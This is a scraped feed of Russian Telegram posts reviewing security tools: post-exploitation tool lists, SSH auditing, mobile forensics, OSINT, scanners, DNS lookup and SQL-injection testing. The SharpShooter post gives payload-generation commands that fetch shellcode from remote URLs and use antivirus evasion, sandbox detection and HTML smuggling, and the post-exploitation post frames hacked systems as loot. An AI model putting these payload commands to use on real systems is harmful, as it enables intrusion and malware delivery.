Forwarded from Social Engineering
😈 Постэксплуатация. Подборка инструментов.
• Постэксплуатация — это один из этапов взлома компьютерных систем, позволяющий собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза постэксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений.
• Как известно, идеальных систем не бывает — всегда найдется уязвимое место, где можно закрепиться и продвинуться вглубь. Но если у тебя одна-единственная точка входа, то каждый твой шаг должен быть досконально продуман и каждое решение должно быть тщательно взвешено.
• В этом посте я собрал для тебя подборку инструментов для постэксплуатации, описание каждого инструмента и всю необходимую информацию, ты найдешь перейдя по ссылке нужного инструмента:
• 3snake • Apfell • Backdoorme • CatTails • Cloudy-kraken • Covenant • CrackMapExec • CredCrack • Creddump • DBC2 • DET • DNSlivery • Dnsteal • Empire • Enumdb • EvilOSX • Fireaway • FruityC2 • GetVulnerableGPO • Ghost In The Logs • HoneyBadger •
HoneypotBuster • Iodine • Koadic • Mallory • Mimikatz • Mimikittenz • NoPowerShell • Orc • P0wnedShell • PacketWhisper • Paragon • Pivoter • Poet • PoshC2 • PowerOPS • ProcessHider • Pupy • Pwnat • Pypykatz • RedGhost • RemoteRecon • RottenPotatoNG • Rpc2socks • SafetyKatz • Shad0w • SharpC2 • SocksOverRDP • SpYDyishai • SprayWMI • Tgcd • TheFatRat •
WCE • Weasel •
• Ценность взломанной системы определяется весомостью фактических данных, хранящихся в ней, и тем, как ты можешь их использовать в своих целях.
‼️ Дополнительный материал, ты сможешь найти по хештегу #Пентест #ИБ #Hack и #tools. Твой S.E.
🖖🏻 Приветствую тебя user_name.• Эксплуатация представляет собой последовательность действий, которая помогает атакующему получить доступ к исследуемой системе, используя уязвимость или ошибку в настройках.
• Постэксплуатация — это один из этапов взлома компьютерных систем, позволяющий собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза постэксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений.
• Как известно, идеальных систем не бывает — всегда найдется уязвимое место, где можно закрепиться и продвинуться вглубь. Но если у тебя одна-единственная точка входа, то каждый твой шаг должен быть досконально продуман и каждое решение должно быть тщательно взвешено.
• В этом посте я собрал для тебя подборку инструментов для постэксплуатации, описание каждого инструмента и всю необходимую информацию, ты найдешь перейдя по ссылке нужного инструмента:
• 3snake • Apfell • Backdoorme • CatTails • Cloudy-kraken • Covenant • CrackMapExec • CredCrack • Creddump • DBC2 • DET • DNSlivery • Dnsteal • Empire • Enumdb • EvilOSX • Fireaway • FruityC2 • GetVulnerableGPO • Ghost In The Logs • HoneyBadger •
HoneypotBuster • Iodine • Koadic • Mallory • Mimikatz • Mimikittenz • NoPowerShell • Orc • P0wnedShell • PacketWhisper • Paragon • Pivoter • Poet • PoshC2 • PowerOPS • ProcessHider • Pupy • Pwnat • Pypykatz • RedGhost • RemoteRecon • RottenPotatoNG • Rpc2socks • SafetyKatz • Shad0w • SharpC2 • SocksOverRDP • SpYDyishai • SprayWMI • Tgcd • TheFatRat •
WCE • Weasel •
• Ценность взломанной системы определяется весомостью фактических данных, хранящихся в ней, и тем, как ты можешь их использовать в своих целях.
‼️ Дополнительный материал, ты сможешь найти по хештегу #Пентест #ИБ #Hack и #tools. Твой S.E.
Tracecat — открытая платформа автоматизации с ИИ для security и IT-команд: позволяет собирать workflows, оркестрировать алерты, вести кейсы и работать с таблицами в одном месте. Данный инструмент можно использовать как лёгкую, расширяемую альтернативу коммерческим SOAR/automation‑решениям.
Основные возможности Tracecat
- Клонировать репозиторий и развернуть стек через docker-compose по инструкции из официальной документации.
- После запуска UI доступен локально, где создаётся первый пользователь и рабочее пространство.
- Использовать Terraform‑модуль для развёртывания прод‑стека на AWS Fargate.
- Подходит для команд, которым нужны масштабируемость и интеграция с облачной инфраструктурой.
#tools #ai #soar #automatization
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤4🔥4
SSH-Audit: Комплексный аудит конфигураций SSH-серверов и клиентов
👍 Возможности
- Анализ всех алгоритмов обмена ключами (kex), шифрования (enc), аутентификации (mac) и сжатия, поддерживаемых сервером или клиентом
- Для каждого алгоритма показывает историю изменений в OpenSSH/Dropbear, помечает устаревшие и слабые варианты, дает команды для исправления конфигурации
- Встроенная проверка на соответствие стандартам безопасности (CIS, базовые настройки ОС) с использованием готовых или пользовательских политик
- Запуск временного сервера для анализа алгоритмов, которые используют подключающиеся клиенты
- Определение типа и версии SSH-сервера, а также операционной системы по баннеру
- Проведение тестов на специфические уязвимости (например, DHEat/CVE-2002-20001)
- Цветной читаемый отчет или структурированный JSON для интеграции в системы автоматического мониторинга (SIEM)
➡️ Установка
Проверка
➡️ Базовое сканирование сервера
Эта команда выполнит полный аудит SSH-сервера на стандартном порту 22 и выведет детальный отчет с оценкой ([fail], [warn], [info]) для каждого алгоритма
➡️ Сканирование с указанием порта
Полезно для проверки сервисов, работающих на нестандартных портах, например, в тестовых или изолированных средах
➡️ Массовое сканирование с проверкой по политике
С помощью флага
➡️ Тест на уязвимость DHEat
Флаг
👎 Недостатки
- Инструмент не проводит активных эксплойтов или глубокого тестирования на проникновение. Он лишь отражает объявленную сервером конфигурацию
- Определение версии ПО основывается на баннере, который может быть изменен администратором в целях безопасности (security through obscurity)
- Не оценивает стойкость паролей или ключей, фокусируясь исключительно на настройках протокола
#tools #SSH #audit #CIS
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Для связи с менеджером
SSH-Audit — это инструмент командной строки, предназначенный для глубокого анализа конфигурации безопасности SSH на удаленных серверах и клиентах. Его основная задача — проверка поддерживаемых алгоритмов обмена ключами, шифрования, аутентификации сообщений, а также выявление устаревших, слабых или небезопасных настроек путем пассивного сбора информации от целевого хоста. В отличие от ручной проверки, SSH-Audit предоставляет структурированный, детальный отчет с цветовой индикацией рисков и конкретными рекомендациями по исправлению.
- Анализ всех алгоритмов обмена ключами (kex), шифрования (enc), аутентификации (mac) и сжатия, поддерживаемых сервером или клиентом
- Для каждого алгоритма показывает историю изменений в OpenSSH/Dropbear, помечает устаревшие и слабые варианты, дает команды для исправления конфигурации
- Встроенная проверка на соответствие стандартам безопасности (CIS, базовые настройки ОС) с использованием готовых или пользовательских политик
- Запуск временного сервера для анализа алгоритмов, которые используют подключающиеся клиенты
- Определение типа и версии SSH-сервера, а также операционной системы по баннеру
- Проведение тестов на специфические уязвимости (например, DHEat/CVE-2002-20001)
- Цветной читаемый отчет или структурированный JSON для интеграции в системы автоматического мониторинга (SIEM)
sudo apt install ssh-audit
Проверка
ssh-audit -h
ssh-audit 192.168.1.100
Эта команда выполнит полный аудит SSH-сервера на стандартном порту 22 и выведет детальный отчет с оценкой ([fail], [warn], [info]) для каждого алгоритма
ssh-audit -p 2222 example.com
Полезно для проверки сервисов, работающих на нестандартных портах, например, в тестовых или изолированных средах
ssh-audit --targets=hosts.txt --policy="OpenSSH 8.9" --threads=10
С помощью флага
--targets указывается файл со списком хостов (по одному на строку, в формате хост:порт). Флаг --policy запускает проверку каждого хоста на соответствие заданной встроенной политике безопасности, а --threads управляет параллелизмом сканирования для ускорения процессаssh-audit --dheat=5:diffie-hellman-group-exchange-sha256 example.com
Флаг
--dheat активирует тест для проверки уязвимости CVE-2002-20001 (DHEat), который может привести к отказу в обслуживании. В данном примере тест выполняется с 5 одновременными соединениями, используя указанный алгоритм обмена ключами- Инструмент не проводит активных эксплойтов или глубокого тестирования на проникновение. Он лишь отражает объявленную сервером конфигурацию
- Определение версии ПО основывается на баннере, который может быть изменен администратором в целях безопасности (security through obscurity)
- Не оценивает стойкость паролей или ключей, фокусируясь исключительно на настройках протокола
#tools #SSH #audit #CIS
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍9🔥7
Набор утилит для упрощения и автоматизации процесса сбора данных для криминалистической экспертизы, которые помогают выявить потенциальную компрометацию устройств на базе Android и iOS.
Поддерживает установку из исходного кода или из PyPI:
python3 -m venv env
source env/bin/activate
pip install mvt
#OR
pipx install --force git+https://github.com/mvt-project/mvt.git
MVT предоставляет две команды
mvt-ios и mvt-android.Для начала работы необходимо создать резервную копию iTunes. Хотя резервные копии содержат лишь часть файлов, хранящихся на устройстве, во многих случаях этого может быть достаточно, чтобы обнаружить некоторые подозрительные артефакты.
После получения зашифрованной резервной копии необходимо сначала расшифровать ее.
mvt-ios decrypt-backup [OPTIONS] BACKUP_PATH
Запуск mvt-ios на резервной копии.
mvt-ios check-backup --output /path/to/output/ /path/to/backup/udid/
Эта команда создаст несколько файлов JSON, содержащих результаты извлечения.
Поскольку вредоносные атаки на Android обычно осуществляются через вредоносные или бэкдорные приложения, первое, что следует сделать, — это извлечь и проверить все установленные пакеты Android и быстро определить, какие из них являются вредоносными или нетипичными с помощью таких сервисов, как VirusTotal.
mvt-android download-apks --output /path/to/folder
MVT_VT_API_KEY=<key> mvt-android download-apks --output /path/to/folder --virustotal
Кроме того, с помощью Android Debug Bridge (adb) можно получить дополнительную диагностическую информацию с телефона. Чтобы проверить устройство Android через adb, сначала необходимо установить Android SDK Platform Tools. Самый простой способ проверить устройство — подключить его через USB. Необходимо включить отладку по USB и подключить устройство к компьютеру.
mvt-android check-adb --output /path/to/results
#android #ios #forensic #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤7🔥5
PH0MBER
PH0MBER — это платформа OSINT, представляющая собой универсальный инструмент для сбора информации и проведения разведки.
Это может помочь вам собрать информацию (например, номера телефонов, IP-адреса, данные о доменных именах и т. д.) из различных общедоступных источников о целевом объекте.
Утилита похожа на MetaSploit Framework по внешнему виду и управлению. Программа не обладает большим или сложным функционалом и подойдёт даже новичкам.
📕 Характеристика:
1️⃣ Поиск по номеру телефона
2️⃣ Поиск по IP-адресу
3️⃣ Поиск по MAC-адресу
4️⃣ Поиск информации через whois
5️⃣ Поиск по имени пользователя
📌 Установка:
💻 Использование:
➖ Поиск по номеру телефона:
➖ Поиск информации с whois:
#OSINT #tools
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Для связи с менеджером
PH0MBER — это платформа OSINT, представляющая собой универсальный инструмент для сбора информации и проведения разведки.
Это может помочь вам собрать информацию (например, номера телефонов, IP-адреса, данные о доменных именах и т. д.) из различных общедоступных источников о целевом объекте.
Утилита похожа на MetaSploit Framework по внешнему виду и управлению. Программа не обладает большим или сложным функционалом и подойдёт даже новичкам.
git clone https://github.com/s41r4j/phomber.git
cd phomber
pip3 install mac-vendor-lookup
python3 phomber.py
phone <NUMBER>
whois <DOMAIN>
#OSINT #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍9🔥7
Unicornscan: Высокоскоростной асинхронный сканер для сетевой разведки
🔘 Ключевые особенности и преимущества
- Отдельные процессы для отправки и прослушивания пакетов позволяют достигать высокой скорости и эффективности
- Поддержка TCP (SYN, ACK, FIN, NULL, XMAS, произвольные флаги), UDP, ICMP, ARP-сканирования и составных режимов
- Встроенная поддержка сигнатур p0f v3 для анализа характеристик TCP/IP стека и определения операционной системы удалённого хоста (более 50 отпечатков)
- Возможность эмулировать поведение TCP/IP стека различных ОС (Linux, Windows, macOS и др.) при отправке пакетов для обхода простых систем обнаружения
- Для UDP-сканирования может отправлять специфичные для служб пакеты (DNS, HTTP, SIP, SSDP), повышая точность обнаружения
➡️ Установка
Проверка
➡️ Базовый TCP SYN-скан
Команда выполнит подробное TCP SYN-сканирование портов с 1 по 1024 на хосте 192.168.1.100 с немедленным выводом в реальном времени, обработкой всех типов ответов (открытые, закрытые, фильтруемые порты) и максимальной детализацией технических параметров сетевых пакетов
➡️ Быстрый порт-сканинг с указанием интерфейса и TTL
Команда выполнит быстрое сканирование всех 65 тысяч портов на всех хостах в сети 10.0.0.0/24, используя сетевой интерфейс eth0, со скоростью 2000 пакетов в секунду и значением TTL 64 для маскировки под стандартный Linux-трафик
➡️ TCP-сканирование с записью трафика для последующего анализа
Команда выполнит нестандартное TCP-сканирование с флагами FIN, PSH и URG (без SYN) портов 22, 80 и 443 на хосте 192.168.1.50, используя случайные исходные порты и сохраняя все полученные ответные пакеты в файл scan_capture.pcap для последующего сетевого анализа
➡️ Ограничения
- Unicornscan создан для быстрого сбора данных (открытые порты, живые хосты, ОС). Он не заменяет полноценные сканеры уязвимостей или сложные скриптовые движки, такие как у Nmap
- Интерпретация вывода, особенно в детальном режиме, требует понимания сетевых протоколов
- Для сканирования интернет-хостов составные режимы с ARP (-mA+...) не работают, так как требуют нахождения в одном широковещательном домене (L2)
#tools #audit #scanner #TCP #UDP #SYN
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Для связи с менеджером
Unicornscan — это асинхронный инструмент для сетевой разведки и аудита безопасности, предназначенный для быстрой доставки сетевых стимулов и записи ответов. Его ключевое отличие от традиционных сканеров (таких как Nmap) — асинхронная, масштабируемая архитектура, позволяющая достигать высокой скорости сканирования (25.000+ пакетов в секунду), что делает его отличным выбором для обследования больших сетей.
- Отдельные процессы для отправки и прослушивания пакетов позволяют достигать высокой скорости и эффективности
- Поддержка TCP (SYN, ACK, FIN, NULL, XMAS, произвольные флаги), UDP, ICMP, ARP-сканирования и составных режимов
- Встроенная поддержка сигнатур p0f v3 для анализа характеристик TCP/IP стека и определения операционной системы удалённого хоста (более 50 отпечатков)
- Возможность эмулировать поведение TCP/IP стека различных ОС (Linux, Windows, macOS и др.) при отправке пакетов для обхода простых систем обнаружения
- Для UDP-сканирования может отправлять специфичные для служб пакеты (DNS, HTTP, SIP, SSDP), повышая точность обнаружения
sudo apt install unicornscan
Проверка
unicornscan -h
sudo unicornscan -mT -p 1-1024 -I -E -vvv 192.168.1.100
Команда выполнит подробное TCP SYN-сканирование портов с 1 по 1024 на хосте 192.168.1.100 с немедленным выводом в реальном времени, обработкой всех типов ответов (открытые, закрытые, фильтруемые порты) и максимальной детализацией технических параметров сетевых пакетов
sudo unicornscan -i eth0 -r 2000 -t 64 -p a 10.0.0.0/24
Команда выполнит быстрое сканирование всех 65 тысяч портов на всех хостах в сети 10.0.0.0/24, используя сетевой интерфейс eth0, со скоростью 2000 пакетов в секунду и значением TTL 64 для маскировки под стандартный Linux-трафик
unicornscan -mTsFPU -s r -w scan_capture.pcap -p 22,80,443 192.168.1.50
Команда выполнит нестандартное TCP-сканирование с флагами FIN, PSH и URG (без SYN) портов 22, 80 и 443 на хосте 192.168.1.50, используя случайные исходные порты и сохраняя все полученные ответные пакеты в файл scan_capture.pcap для последующего сетевого анализа
- Unicornscan создан для быстрого сбора данных (открытые порты, живые хосты, ОС). Он не заменяет полноценные сканеры уязвимостей или сложные скриптовые движки, такие как у Nmap
- Интерпретация вывода, особенно в детальном режиме, требует понимания сетевых протоколов
- Для сканирования интернет-хостов составные режимы с ARP (-mA+...) не работают, так как требуют нахождения в одном широковещательном домене (L2)
#tools #audit #scanner #TCP #UDP #SYN
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍6🔥6
Фреймворк для создания полезных нагрузок, предназначенный для загрузки и выполнения произвольного исходного кода на C#. Инструмент может создавать полезные нагрузки в различных форматах, включая HTA, JS, VBS и WSF. Используется DotNetToJavaScript для вызова методов из сериализованного .NET-объекта SharpShooter.
Полезные нагрузки можно получать через веб или DNS, либо через оба канала одновременно. Также возможна генерация stageless полезных нагрузок со встроенным выполнением шелл-кода.
Созданные полезные нагрузки шифруются алгоритмом RC4 со случайным ключом для базового обхода антивирусов. Фреймворк также включает возможности обнаружения песочниц и привязки к окружению для повышения скрытности.
Поддерживает возможность упаковывать полезную нагрузку в HTML-файл с использованием техники Demiguise HTML smuggling.
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl
SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
#tools #payload #SharpShooter
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍6🔥5
GEOLOCATOR_ULTIMATE
Это инструмент геолокации, написанный на Python, который использует множество источников информации и сопоставляет данные из различных источников.
это продвинутый инструмент геолокации, который объединяет более 20 различных источников для определения физического местоположения IP-адреса или домена. Этот инструмент предназначен для специалистов по безопасности, исследователей, придерживающихся этических норм, и сетевых команд.
📕 Характиристика:
1️⃣ Автономная база данных (MaxMind GeoLite2)
2️⃣ Расширенный анализ консенсуса
3️⃣ Выявление угроз и репутации
4️⃣ Генерация отчетов в формате JSON
5️⃣ Интуитивно понятный интерфейс терминала
💻 Установка:
📌 Запуск:
➖ Запуск с доменом или IP:
➖ Сохранить вывод в JSON:
#tools #osint
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Для связи с менеджером
Это инструмент геолокации, написанный на Python, который использует множество источников информации и сопоставляет данные из различных источников.
это продвинутый инструмент геолокации, который объединяет более 20 различных источников для определения физического местоположения IP-адреса или домена. Этот инструмент предназначен для специалистов по безопасности, исследователей, придерживающихся этических норм, и сетевых команд.
git clone https://github.com/hackermexico/geolocator_ultimate.git
cd geolocator_ultimate/
python3 geoultimate.py <TAGRGET>
python3 geoultimate.py <TAGRGET> --save
#tools #osint
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍7❤5🙈1
git clone https://github.com/zmap/zdns.git
cd zdns
make install
Состоит из следующих типов модулей:
A, AAAA, AFSDB, ANY, ATMA, AVC, AXFR, BINDVERSION, CAA, CDNSKEY, CDS, CERT, CNAME, CSYNC, DHCID, DMARC, DNSKEY, DS, EID, EUI48, EUI64, GID, GPOS, HINFO, HIP, HTTPS, ISDN, KEY, KX, L32, L64, LOC, LP, MB, MD, MF, MG, MR, MX, NAPTR, NID, NINFO, NS, NSAPPTR, NSEC, NSEC3, NSEC3PARAM, NSLOOKUP, NULL, NXT, OPENPGPKEY, PTR, PX, RP, RRSIG, RT, SVCBS, MIMEA, SOA, SPF, SRV, SSHFP, TALINK, TKEY, TLSA, TXT, UID, UINFO, UNSPEC, URI.
A поиска для IP-адресов, если получен NS в NSLOOKUP).bind.version).Инструмент состоит из библиотеки рекурсивного резолвера и оболочки CLI.
echo "censys.io" | zdns AВ выводе для данной команды будет содержаться следующая информация:
{
"name": "censys.io",
"results": {
"A": {
"data": {
"additionals": [
{
"flags": "",
"type": "EDNS0",
"udpsize": 512,
"version": 0
}
],
"answers": [
{
"answer": "104.18.10.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
},
{
"answer": "104.18.11.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
}
],
"protocol": "udp",
"resolver": "[2603:6013:9d00:3302::1]:53"
},
"duration": 0.285295416,
"status": "NOERROR",
"timestamp": "2024-08-23T13:12:43-04:00"
}
}
}
MX может не включать связанные A записи в дополнительном разделе, что требует дополнительного поиска. Для устранения этого недостатка инструмент также предоставляет несколько модулей поиска: alookup, mxlookup, nslookup.alookup работает аналогично nslookup и отслеживает записи CNAME. mxlookup дополнительно выполняет поиск A для IP-адресов, соответствующих записи обмена. nslookup дополнительно выполняет поиск A/AAAA для IP-адресов, соответствующих записи NS.echo "censys.io" | zdns mxlookup --ipv4-lookup
В выводе для данной команды будет содержаться следующая информация:
{
"name": "censys.io",
"results": {
"MXLOOKUP": {
"data": {
"exchanges": [
{
"class": "IN",
"ipv4_addresses": [
"209.85.202.27"
],
"name": "alt1.aspmx.l.google.com",
"preference": 5,
"ttl": 300,
"type": "MX"
},
{
"class": "IN",
"ipv4_addresses": [
"142.250.31.26"
],
"name": "aspmx.l.google.com",
"preference": 1,
"ttl": 300,
"type": "MX"
}
]
},
"duration": 0.154786958,
"status": "NOERROR",
"timestamp": "2024-08-23T13:10:11-04:00"
}
}
}
#tools #DNS #resolver
Please open Telegram to view this post
VIEW IN TELEGRAM
❤17🔥8👍4🤗4
Go-Hash
Инструмент идентификации алгоритмов для хешей, таких как MD5, SHA1, SHA256, SHA512, MYSQL.
📕 Характеристика:
1️⃣ Очень простой интерфейс.
2️⃣ Поддержка основных алгоритмов (MD5, SHA1, SHA256, SHA512, MYSQL)
💻 Установка:
📌 Запуск:
#tools #hash #cryptography
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Для связи с менеджером
Инструмент идентификации алгоритмов для хешей, таких как MD5, SHA1, SHA256, SHA512, MYSQL.
git clone https://github.com/HunxByts/Go-Hash.git
cd Go-Hash
pip3 install -r requirements.txt --break-system-packages
python3 gohash.py
#tools #hash #cryptography
Please open Telegram to view this post
VIEW IN TELEGRAM
2👎26🤬18❤16👍7🔥7🍌1
SQLMutant
SQLMutant — это инструмент для тестирования SQL-инъекций, включающий как пассивные, так и активные процессы разведки для любого заданного домена. Он фильтрует URL-адреса, чтобы выявить те, параметры которых подвержены SQL-инъекциям, а затем выполняет атаки с использованием инъекций. Эти атаки включают сопоставление шаблонов, анализ ошибок и атаки по времени.
📕 Характиристика:
1️⃣ URL Fuzzer - Эта функция позволяет пользователю указать целевой URL-адрес, а затем выполнить фаззинговую атаку для обнаружения любых уязвимых параметров, которые могут быть использованы для SQL-инъекций.
2️⃣ SQL Payloads - SQLMutant предоставляет набор предопределенных полезных нагрузок для SQL-инъекций, которые можно использовать для проверки наличия уязвимостей.
3️⃣ Header Fuzzer - Эта функция позволяет пользователю фаззингировать HTTP-заголовки для проверки на наличие уязвимостей SQL-инъекций.
4️⃣ Waybackurls Integration - В SQLMutant интегрирован инструмент Waybackurls, используемый для поиска исторических версий веб-страницы. Эта функция позволяет находить страницы, которые больше недоступны, но могут содержать уязвимости, существовавшие в прошлом.
5️⃣ Arjun Integration - SQLMutant также интегрирует инструмент Arjun, который используется для поиска скрытых параметров и каталогов на веб-сервере.
💻 Установка:
Лучше добавить эти команды в ~/.bashrc
📌 Запуск:
#tools #web #SQL
➡️ Все наши каналы 💬 Все наши чаты ⚡️ Для связи с менеджером
SQLMutant — это инструмент для тестирования SQL-инъекций, включающий как пассивные, так и активные процессы разведки для любого заданного домена. Он фильтрует URL-адреса, чтобы выявить те, параметры которых подвержены SQL-инъекциям, а затем выполняет атаки с использованием инъекций. Эти атаки включают сопоставление шаблонов, анализ ошибок и атаки по времени.
pip3 install uro --break-system-packages
sudo apt install golang-go
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
go install github.com/tomnomnom/waybackurls@latest
sudo apt-get install arjun
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
sudo apt-get install jq toilet lolcat
git clone https://github.com/blackhatethicalhacking/SQLMutant.git
cd SQLMutant/
chmod +x SQLMutant.sh
./SQLMutant.sh
#tools #web #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
😱10😢7❤6👍6🔥4👎3🗿2😁1